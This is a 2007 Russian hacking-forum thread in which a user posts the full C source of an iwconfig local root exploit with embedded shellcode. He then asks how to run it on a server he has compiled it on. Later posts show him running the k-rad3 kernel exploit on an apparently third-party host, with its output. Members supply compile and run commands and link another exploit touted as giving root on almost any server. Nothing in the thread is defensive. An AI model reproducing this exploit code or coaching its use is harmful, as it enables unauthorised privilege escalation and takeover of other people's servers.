Root сплоит

Discussion in 'Безопасность и Анонимность' started by ~GroM~, 17 Mar 2007.

Thread Status:
Not open for further replies.
  1. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    здравствуйте вот тут есть такой сплоит


    /*
    Name: iw-config.c
    Copyright: !sh2k+!tc2k
    Author: heka
    Date: 11/11/2003
    Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS
    Description: /sbin/iwconfig - local root exploit
    iwconfig manipulate the basic wireless parameters

    */

    #include <stdio.h>

    #define BIN "/sbin/iwconfig"

    unsigned char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x13\xcd\x80\x31\xc0\xb0\x2e"
    "\xcd\x0\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
    "\xb0\x27\xcd\x80\x30\xc0\xb0\x3d\xcd\x80\x31\xc0"
    "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
    "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
    "\x6a\x2e\x89\xe3\xb1\x3d\xcd\x80\x31\xc0\x31\xdb"
    "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
    "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";

    int
    main ()
    {
    int x;
    char buf[97], out[13321], *buffer;
    unsigned long ret_add = 0xbffffbb8, *add_ptr ;
    buffer = buf;
    add_ptr = (long *)buffer;
    for (x=0; x<97-1; x+=4)
    *(add_ptr++)=ret_add;
    memset ((char *)out, 0x90, 1337);
    memcpy ((char *)out + 333, shellcode, strlen(shellcode));
    memcpy((char *)out, "OUT=", 4);
    putenv(out);
    execl (BIN, BIN, buf, NULL);
    return 0;
    }
    я его скомпилил на сервере у меня получилося сейчас вопрос как с ним работать ?
     
  2. gcc

    gcc Elder - Старейшина

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    Во-первых не туда отпостил, для сплойтов есть спец тема выше.
    Как работать - запускай получившийся бинарник =)
     
  3. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    как именно запускать ?
     
  4. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    да и еще одно как запускать вот этот сплоит k-rad3.c кто может помогите стукните в 924607
    запускаю вроде все правильо

    bash-2.05b$ ./k-rad3 -t 1 -p 2
    ←[1;30m[ ←[1;37m k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ←[1;30m ]←[0m
    ←[1;30m[ ←[1;37mDiscovered Jan 2005 by sd <[email protected]>←[1;30m ]←[0m
    ←[1;30m[ ←[1;37mModified 2005/9 by alert7 <[email protected]>←[1;30m ]←[0m
    [+] try open /proc/cpuinfo .. ok!!
    [+] find cpu flag pse in /proc/cpuinfo
    [+] CONFIG_X86_PAE :none
    [+] Cpu flag: pse ok
    [+] Exploit Way : 0
    [+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n)
    [+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
    epoll_wait: Invalid argument
    Linux landing.captainserver.net 2.6.8-022stab070.4-enterprise #1 SMP Mon Mar 6
    5:28:36 MSK 2006 i686 athlon i386 GNU/Linux
    [+] idtr.base 0xffff4000 ,base 0xc0000000
    [+] kwrite base 0xc0000000, buf 0xbffed7e0,num 8196
    [-] This kernel not vulnerability!!!
    bash-2.05b$ id
    uid=99(nobody) gid=99(nobody) groups=99(nobody)
    bash-2.05b$

    но что то ни чего не выходит
     
  5. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Всё и так написано Kernel not vulnerability.....
     
  6. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    Спасибо а вообще запускал правильно? и еще одно как первый сплоит юзать
     
  7. gcc

    gcc Elder - Старейшина

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    Ну тогда уж gcc iw-config.c -o iw-config
    ./iw-config
     
    #7 gcc, 17 Mar 2007
    Last edited by a moderator: 18 Mar 2007
    1 person likes this.
  8. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    ультросплоент
    http://xpl.jino-net.ru/gcc343prior.c
    даёт права uid=0(root) gid=0(root) почти на любом серваке

    [size=-200]гавносплойт=\[/size]
     
    _________________________
    4 people like this.
  9. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    спасибо тоха с меня плюс
     
Thread Status:
Not open for further replies.